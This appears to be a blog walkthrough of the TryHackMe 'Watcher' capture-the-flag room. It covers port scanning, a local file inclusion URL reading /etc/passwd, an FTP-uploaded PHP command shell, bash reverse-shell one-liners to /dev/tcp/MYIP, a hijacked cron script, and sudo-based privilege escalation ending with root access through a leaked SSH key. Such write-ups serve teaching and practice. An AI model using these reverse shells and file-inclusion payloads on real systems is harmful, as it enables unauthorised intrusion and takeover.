Home Watcher | Tryhackme write up

Watcher | Tryhackme write up

Hi! this is my take on Watcher CTF from TryHackme, the room is simple but very entertaining. At first it seemed that it was going to be too easy but I liked that there were several privilege escalations and all of them were different.

These are some topic you will see in this room:

  • Directory fuzzing
  • Local file inclusion
  • Upload malicious file
  • Abuse of sudo permissions for privilege escalation
  • Abuse of cron job for privilege escalation

Room link: Watcher room Tryhackme


To know what os I’m facing i start by running **ping -c 1 **, thanks to the TTL i can guess that this is a Linux box. I continue by running **Nmap** three times,I am using Syn scan against the whole port range of the victim machine, which shows me that there are three open ports, 21, 22 and 80.

First Nmap scan for open ports Nmap scanning for open ports

Knowing this I re-launch it with the C and V scripts to find out version and service.

Second Nmap scan for versions -sCV scan to know versions And finally with the http-enum script, which uses a small dictionary to fuzz well known routes.

Second Nmap scan for versions -sCV scan to know versions

Http-enum results http-enum script results

There’s nothing weird and the discovery of robots.txt its interesting so I’m checking the web and robots.txt now.

Website homepage Website homepage

The web is running with Apache and seems like a Jekyll blog, some buttons are not even working so I’m going straight to robots.txt.

robots.txt contents robots.txt contents There are 2 file routes inside robots.txt the first one is accessible and it’s the first flag, the second one requires permissions that i dont have.

First flag First flag

Looking again at the home page, I see something suspicious in the links of each post, it seems that the web could be vulnerable to LFI(Local File Inclusion)

Web could be vulnerable to LF Vulnerable to LFI?

I’m trying to list /etc/passwd and for that i’m using this route: http://VICTIMIP/post.php?post=../../../../../../etc/passwd. It works!

/etc/passwd content Content of /etc/passwd

I can see that there’s three users: toby, mat and will.

Gaining access

I start by showing /secret_file_do_not_read.txt, the file i couldn’t read before because I had no permissions. But now with LFI it’s easy to see it’s contents:

/secret_file_do_not_read.txt contents /secret_file_do_not_read.txt contents

Reading this, I already know what i have to do, i have to login into ftp and try upload a malicious .php file because now i know where there route to that file is.

The credentials were valid, and now I’m login into ftp, where the second flag is located, and a files directory next to it.

Ftp contents Ftp contents

I’m next writing my malicious file and uploading it into this files folder. This is the code I’m using:


This code permits us to run a command with the GET request variable ‘cmd’. The upload is completed, and i know where the file exactly is. I show the file with the LFI i used before, running whoami with our new cmd variable.

Remote code execution working Remote code execution working

To get a reverse shell, im gonna run this with my new RCE method, and I’m url encoding it:

bash -c 'bash -i >& /dev/tcp/MYIP/443 0>%1'

At the same time I’m listening port 443 with netcat.

nc -lnvp 443

With this i gained access as www-data

Access gained as www-data

Access gained as www-data

Privilege escalation

First privilege escalation

After treating the terminal to turn it into an interactive one, I run sudo -l and see that i can run any command i want as toby without password, so i run sudo -u toby bash and I’m now toby.

privesc toby Easy privesc to toby

Second privilege escalation

I continue by visiting toby’s home and there’s a note next to flag 3 and a directory called jobs. This is the content of note.txt

note.txt content note.txt content

There’s a cron job running and i guess it’s running into jobs directory. There’s a file inside jobs directory called cow.sh, it’s a script that backups an image into /tmp directory, but i have write permissions, so i change it’s contents to this:

bash -c 'bash -i >& /dev/tcp/MYIP/444 0>%1'

I’m using port 444 now as I’m still using 443 for the reverse shell I’m actually using. After listening with netcat and waiting a minute, I get a reverse shell as Mat.

privesc mat Privesc to Mat

Second privilege escalation

As before, the first two things i do is sudo -l and visiting my home. I can run python3 with a specific file as will and that file is inside my home.

vsudo mat Sudo for mat

The code of this will_script let’s me run three commands, ls, id and cat /etc/passwd, and it does it by calling a function from another script cmd.py. But I’m realizing that I’m the owner of cmd.py and i can write inside.

Code permissions Code of both scripts and permissions

I’m editing cmd.py code to run a bash instead ls -lah when using 1 as argument, and because i can run it as will, this bash will be as will too.

new cmd.py New cmd.py code And it works.

privesc will Privilege escalation to will

Last privilege escalation to root

I struggled a bit with this privilege escalation because I lost like 15min investigating around adm group and checking log files from /var/log, but after a bit i realized that there’s nothing there and after cheking some things like sudo -l, SUID files, I found a backups directory inside /opt. There’s a file named key.b64 inside, I’m decoding the content with base 64 and a private key is showing.

Private ssh key found Private ssh key found

After putting the key into an id_rsa file and using it like this from my terminal: ssh -id id_rsa root@VICTIMIP

Access as root Access as root

I got access as root!. Flags 4,5,6 and 7 was in /home/toby, /home/mat, /home/will and /root directories respectively, while flag 3 was in /var/www/html/

See you soon and enjoy this nice CTF!

This post is licensed under CC BY 4.0 by the author.